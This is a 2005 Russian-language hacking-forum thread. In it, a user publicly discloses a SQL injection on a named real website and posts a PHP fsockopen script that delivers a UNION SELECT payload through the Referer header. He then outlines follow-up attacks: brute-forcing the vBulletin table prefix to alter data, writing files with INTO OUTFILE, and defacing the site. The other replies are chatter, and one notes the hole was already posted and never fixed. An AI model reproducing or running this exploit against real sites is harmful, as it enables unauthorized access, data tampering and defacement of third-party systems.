Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.12.2005, 16:07
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632
Репутация:
749
|
|
skvoznoy.org
Мимо проходил. Сайт из серии крутых хакеров:
skvoznoy.org
____________________________________
$fp=fsockopen("skvoznoy.org",80);
fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*
");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________
SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт
Последний раз редактировалось Zadoxlik; 05.12.2005 в 16:33..
Причина: сменил тему
|
|
|
05.12.2005, 16:30
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524
Репутация:
9
|
|
Ты это к чему? Ты вопрос какойто задал?
|
|
|
|
05.12.2005, 16:31
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632
Репутация:
749
|
|
Сообщение от bul666
Ты это к чему? Ты вопрос какойто задал?
нет, дал пищу для размышлений и, возможно, каких-либо действий для тех кому заняться нечем
|
|
|
|
05.12.2005, 16:44
|
|
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
Провел на форуме:
7544767
Репутация:
1060
|
|
Сообщение от Zadoxlik
нет, дал пищу для размышлений и, возможно, каких-либо действий для тех кому заняться нечем
fsockopen очень уж часто я с ним сталкиваюсь. И понятно почему =)
Надо же.... Zadoxlik рано в паблик скинул ИМХО =)
__________________
ICQ 9731923
|
|
|
|
05.12.2005, 17:06
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Это ты в исходниках посмсотрел?
|
|
|
|
05.12.2005, 17:08
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Блин жалко у меня ума не хватит что как делать а инькция у меня не вылазиет почему то.
|
|
|
|
05.12.2005, 17:17
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632
Репутация:
749
|
|
Сообщение от SanyaX
Это ты в исходниках посмсотрел?
Не, это просто пример эксплуатации с помощью PHP скрипта, ибо браузером ты такое не сделаешь.
На сколько мне известно, все нормальные люди пользуют в таких случаях InetCrack (или как-то так), но у меня его нет.
|
|
|
|
05.12.2005, 17:30
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
|
|
|
|
05.12.2005, 17:50
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
интересно а зачем на паблик кинул=) я в скуле несилен к сожалению(
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
05.12.2005, 20:26
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
интересно а зачем на паблик кинул=) я в скуле несилен к сожалению(
хех, эту уявзимость уже я наверное месяц назад на паблик выложил (смотри в теме "бажные сайты от киборга").
и никто даже не пытался прикрыть
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
